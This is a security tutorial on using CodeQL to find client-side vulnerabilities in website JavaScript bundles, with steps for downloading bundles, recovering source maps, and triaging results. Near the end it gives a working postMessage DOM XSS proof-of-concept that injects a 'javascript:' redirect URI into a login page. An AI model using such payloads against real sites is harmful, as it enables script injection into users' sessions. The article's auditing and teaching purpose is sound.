GitHub’s CodeQL is a powerful query language, originally developed by Semmle, that lets you look for vulnerabilities in source code. CodeQL is best known as a tool for inspecting open-source repositories, but its usage is not limited to that. In this article I will walk through how to use CodeQL in web application audits, specifically to discover client-side vulnerabilities.
The idea behind CodeQL is to treat source code as a database that can be queried with SQL-like statements. Many languages are supported, JavaScript among them, in both its server-side and client-side flavours. The JavaScript analysis understands modern editions such as ES6 as well as frameworks like React (with JSX) and Angular.
CodeQL is more than grep: it supports taint tracking, which lets you test whether a given user input (a source) can reach a vulnerable function (a sink). This is especially useful when dealing with DOM-based cross-site scripting (XSS) vulnerabilities. By tainting a user-controlled DOM property such as location.hash, one can test whether this value actually reaches one of the XSS sinks, e.g. an element's innerHTML property or document.write().
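To make the source and sink terminology concrete, here is a minimal sketch of the kind of data flow taint tracking is meant to flag. The function name renderGreeting and the stand-in objects are hypothetical and exist only for this illustration; in a real page the two arguments would be window and a DOM element.

```javascript
// Hypothetical example of a DOM XSS data flow (not taken from any real site).
// `win` stands in for `window` and `target` for a DOM element, so the flow
// can be exercised outside a browser.
function renderGreeting(win, target) {
  // Source: the URL fragment is fully controlled by whoever crafts the link.
  const name = decodeURIComponent(win.location.hash.slice(1));
  // Sink: assigning to innerHTML makes the browser parse the string as HTML.
  target.innerHTML = 'Hello, ' + name;
}

// Stand-in objects that mimic the two browser APIs involved.
const fakeWindow = {
  location: { hash: '#%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E' },
};
const fakeElement = { innerHTML: '' };

renderGreeting(fakeWindow, fakeElement);
console.log(fakeElement.innerHTML);
```

The markup from the fragment ends up in innerHTML unchanged. A taint-tracking query reports exactly this kind of path from location.hash to the assignment, even when the two ends are many function calls apart.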
The common use case for CodeQL is to run a query suite against open-source code repositories. To do so, you may install CodeQL locally or use https://lgtm.com/. In the latter case you specify a GitHub repository URL and add it as your project. If the repository is popular enough, you will get a list of alerts right away, as somebody has already run CodeQL on it. You may also run your own queries to find something that is not covered by the default LGTM query suite. However, CodeQL can be used not just to scan repositories, but also to find bugs on any website on the internet.
Popular web vulnerability scanners like Burp Suite have built-in JavaScript analyzers that scan any JS file found on the website to discover client-side vulnerabilities, primarily DOM XSS. Although they produce some meaningful results, subtle bugs stay under the radar. This is where CodeQL comes into play: it can complement JS source code analysis in any security assessment.
Modern web applications tend to shift business logic from the server to the client. Typically the whole application can be found in a single JS file compiled with a bundler such as webpack. Scanning such bundles with CodeQL takes the following steps. First, all the JS links should be gathered and downloaded. For this task one can use subjs to find the JS links and then meg or just wget to download them. After that, build a CodeQL database from the gathered files by running the following command in the directory that contains them:
codeql database create example.com --language=javascript
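The link-gathering step described above can be sketched in a few lines of JavaScript. This is not how subjs itself is implemented; the function name extractScriptUrls and the sample markup are assumptions made for illustration, and a regular expression is used instead of a real HTML parser to keep the sketch short.

```javascript
// Sketch of the link-gathering step: list the external scripts a page loads.
// A regular expression is enough for an illustration, but it is not an HTML
// parser and it will miss scripts that are injected at runtime.
function extractScriptUrls(html, pageUrl) {
  const urls = new Set();
  const scriptSrc = /<script\b[^>]*?\bsrc\s*=\s*["']([^"']+)["']/gi;
  for (const match of html.matchAll(scriptSrc)) {
    // Resolve relative and protocol-relative links against the page URL.
    urls.add(new URL(match[1], pageUrl).href);
  }
  return [...urls];
}

// Hand-written sample page used only to exercise the function.
const sampleHtml = `
  <script src="/static/js/main.3f2a.js"></script>
  <script src="//cdn.example.com/vendor.js" async></script>
  <script>console.log('inline scripts have no src');</script>
`;

const scriptUrls = extractScriptUrls(sampleHtml, 'https://example.com/auth/login');
console.log(scriptUrls);
```

The resulting list can be handed to wget or any other downloader. Inline scripts are skipped here, so pages that keep significant logic inline need separate handling.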
Once the database is built, it is time to run the actual scan:
codeql database analyze example.com javascript-lgtm.qls --format=sarif-latest --output=results.sarif
This command uses the default LGTM.com query suite (javascript-lgtm.qls) and saves the results in SARIF format, which can later be loaded in VSCode with the help of the SARIF Viewer extension.
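Since SARIF is plain JSON, the results can also be triaged with a short script before opening them in an editor. The sketch below groups findings by rule. The field names (runs, results, ruleId, message.text, locations, physicalLocation) come from the SARIF 2.1.0 format, while the function name summarizeSarif and the sample document are made up for this illustration.

```javascript
// Group SARIF results by rule so that the noisiest queries stand out.
function summarizeSarif(sarif) {
  const byRule = new Map();
  for (const run of sarif.runs ?? []) {
    for (const result of run.results ?? []) {
      const physical = result.locations?.[0]?.physicalLocation;
      const finding = {
        file: physical?.artifactLocation?.uri ?? '(unknown)',
        line: physical?.region?.startLine ?? 0,
        message: result.message?.text ?? '',
      };
      const ruleId = result.ruleId ?? '(no rule id)';
      if (!byRule.has(ruleId)) byRule.set(ruleId, []);
      byRule.get(ruleId).push(finding);
    }
  }
  return byRule;
}

// Tiny hand-written SARIF document, for illustration only. For real output:
//   const sarif = JSON.parse(require('fs').readFileSync('results.sarif', 'utf8'));
const sampleSarif = {
  version: '2.1.0',
  runs: [{
    results: [
      {
        ruleId: 'js/xss',
        message: { text: 'Sample message for illustration.' },
        locations: [{
          physicalLocation: {
            artifactLocation: { uri: 'src/login.js' },
            region: { startLine: 42 },
          },
        }],
      },
      { ruleId: 'js/xss', message: { text: 'Second sample message.' } },
      { ruleId: 'js/unused-local-variable', message: { text: 'Third sample message.' } },
    ],
  }],
};

const summary = summarizeSarif(sampleSarif);
for (const [ruleId, findings] of summary) {
  console.log(`${ruleId}: ${findings.length} finding(s)`);
  for (const f of findings) console.log(`  ${f.file}:${f.line} ${f.message}`);
}
```

Grouping by rule makes it easy to set aside an entire noisy query at once, which helps when a minified bundle produces hundreds of alerts.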
If you analyze bundles produced by webpack, the number of issues may be overwhelming for manual review. That is why it is always better to analyze the unminified source code instead. When building with webpack, developers may choose to include source maps to ease debugging, and with a source map it is possible to recover the original code. Web browsers automatically detect, fetch and interpret source maps.
However, it is not possible to save unpacked source code from a browser, so we will have to use a special tool called unwebpack-sourcemap. With it the procedure is as easy as:
./unwebpack_sourcemap.py --detect https://example.com/auth/login example.com
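To show what such a recovery involves, here is a rough sketch of its two core steps: locating the sourceMappingURL comment at the end of a bundle, and pairing the sources and sourcesContent arrays of a version 3 source map. It is not the implementation of unwebpack-sourcemap; the function names and the sample data are assumptions made for illustration.

```javascript
// Find the source map reference that bundlers append to the end of a JS file.
function findSourceMapUrl(bundleText, bundleUrl) {
  const match = /\/\/[#@]\s*sourceMappingURL=(\S+)\s*$/.exec(bundleText);
  return match ? new URL(match[1], bundleUrl).href : null;
}

// Pair every entry of `sources` with the matching entry of `sourcesContent`.
function recoverSources(sourceMap) {
  const contents = sourceMap.sourcesContent ?? [];
  const files = [];
  sourceMap.sources.forEach((source, index) => {
    const content = contents[index];
    if (typeof content !== 'string') return; // content not embedded in the map
    // Drop the "webpack:///" style prefix and any "." or ".." segments so the
    // result is a relative path that stays inside the output directory.
    const path = source
      .replace(/^[a-z][a-z0-9+.-]*:\/+/i, '')
      .split('/')
      .filter((part) => part !== '' && part !== '.' && part !== '..')
      .join('/');
    files.push({ path, content });
  });
  return files;
}

// Hand-written samples used only to exercise the functions.
const sampleBundle = 'console.log(1);\n//# sourceMappingURL=main.3f2a.js.map\n';
const sampleMap = {
  version: 3,
  sources: ['webpack:///./src/utils/postMessage.js', 'webpack:///../node_modules/lib/index.js'],
  sourcesContent: ['export const a = 1;\n', null],
};

const mapUrl = findSourceMapUrl(sampleBundle, 'https://example.com/static/js/main.3f2a.js');
const recovered = recoverSources(sampleMap);
console.log(mapUrl);
console.log(recovered);
```

Writing each recovered entry to disk under its path gives CodeQL a source tree that is close to what the developers wrote. Maps without sourcesContent only list file names, so nothing can be recovered from them this way.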
After building and analyzing the CodeQL database once again, we can observe that there are far fewer findings and that the results are significantly more relevant.
CodeQL lets you look not only for vulnerabilities but also for code quality issues that may turn out to be security risks on manual review. Here is an example of such an issue, found with the help of CodeQL, that resulted in a DOM XSS on a popular website.
After the initial scan, one finding looked interesting.
Looking at the source code, we see that the function isCompanyDomain() is called with the origin argument inside the receivePostMessage() function:
export const receivePostMessage = (e = {}) => {
  const { origin, data } = e;
  if (isCompanyDomain(origin)) {
    return data;
  }
  return null;
};
Let’s have a look at the isCompanyDomain() function:
const isCompanyDomain = () => true;
Now we understand why CodeQL reported this piece of code: the function ignores the origin argument and always returns true. The code looks like a security check, so this might be a bypass. Let’s find all the calls to receivePostMessage() with the following CodeQL query:
import javascript
from InvokeExpr call
where
call.getCalleeName() = "receivePostMessage"
select call
This gives us the following result:
handleSsoPopupMessage = (e) => {
  const messageObj = receivePostMessage.call(this, e);
  if (messageObj) {
    const { message, props } = messageObj;
    switch (message) {
      case 'SSO_ACTION_SUCCESS':
        this.trackSuccess({
          method: props.oauthProvider,
          action: props.action,
          eventCallback: () => redirect(props.redirectUri),
        });
        break;
    }
  }
};
As you can see, handleSsoPopupMessage() is a postMessage event handler that is supposed to be protected by isCompanyDomain() checking the origin of the message. However, the check always returns true, which looks like technical debt left by the frontend developers. Message handlers are a common source of DOM-based XSS vulnerabilities if left unprotected from external interaction. That is the case here: the attacker-controlled redirectUri property is passed into the redirect() function, which leads to XSS when the payload uses the javascript: scheme. The PoC looks as follows:
<a href="#" onclick="xss()">click me</a>
<script>
  function xss() {
    // Open the target page in a new window and keep a reference to it.
    var win = window.open('https://example.com/auth/login', '_blank');
    // Give the page time to load and register its message handler.
    setTimeout(function () {
      win.postMessage({
        message: 'SSO_ACTION_SUCCESS',
        props: {
          oauthProvider: 'test',
          action: 'test',
          redirectUri: 'javascript:alert(document.location)'
        }
      }, '*');
    }, 5000);
  }
</script>
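For contrast, here is a sketch of what the two missing checks in the handler above could look like: an origin check that actually inspects its argument, and a scheme check on the redirect target. The host list, the decision to accept subdomains and the helper name isSafeRedirect are assumptions made for illustration, not the fix the affected site deployed.

```javascript
// Hypothetical allow-list; the real site's domains are not known here.
const COMPANY_HOSTS = ['example.com'];

// Origin check that actually inspects its argument.
function isCompanyDomain(origin) {
  let url;
  try {
    url = new URL(origin);
  } catch {
    return false; // missing or malformed origin
  }
  if (url.protocol !== 'https:') return false;
  // Accept the listed hosts and their subdomains (an assumption of this sketch).
  return COMPANY_HOSTS.some(
    (host) => url.hostname === host || url.hostname.endsWith('.' + host)
  );
}

// Only allow redirect targets that resolve to http(s); this rejects
// javascript: URIs such as the one used in the PoC.
function isSafeRedirect(redirectUri, baseUrl) {
  try {
    const { protocol } = new URL(redirectUri, baseUrl);
    return protocol === 'https:' || protocol === 'http:';
  } catch {
    return false;
  }
}

console.log(isCompanyDomain('https://login.example.com'));
console.log(isCompanyDomain('https://example.com.evil.net'));
console.log(isSafeRedirect('javascript:alert(document.location)', 'https://example.com/auth/login'));
console.log(isSafeRedirect('/dashboard', 'https://example.com/auth/login'));
```

Either check alone would have stopped the PoC, but they guard against different mistakes: the origin check limits who may send messages, while the scheme check limits what a trusted sender can make the page do.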
CodeQL can complement existing source code analysis tools, for instance Burp Suite’s built-in JS analyzer. However, the real value of CodeQL is that it allows you to create custom checks that can be run on each JS bundle found on a website. Please keep in mind that unless you are conducting academic research, the CodeQL license requires permission from the website owner. I strongly recommend trying GitHub Security Lab CTF 3 to understand how to leverage CodeQL's potential in web application assessments. I also suggest installing the CodeQL CLI locally, together with the VSCode extension, for faster onboarding and more convenient access to the tool.
Audits of large code bases always involve automated tools, especially in the area of web applications. With business logic shifting towards the client side, CodeQL offers an effective way to spot vulnerabilities in JavaScript bundles using customized queries. I hope this tutorial will make CodeQL a part of your web application assessment routine.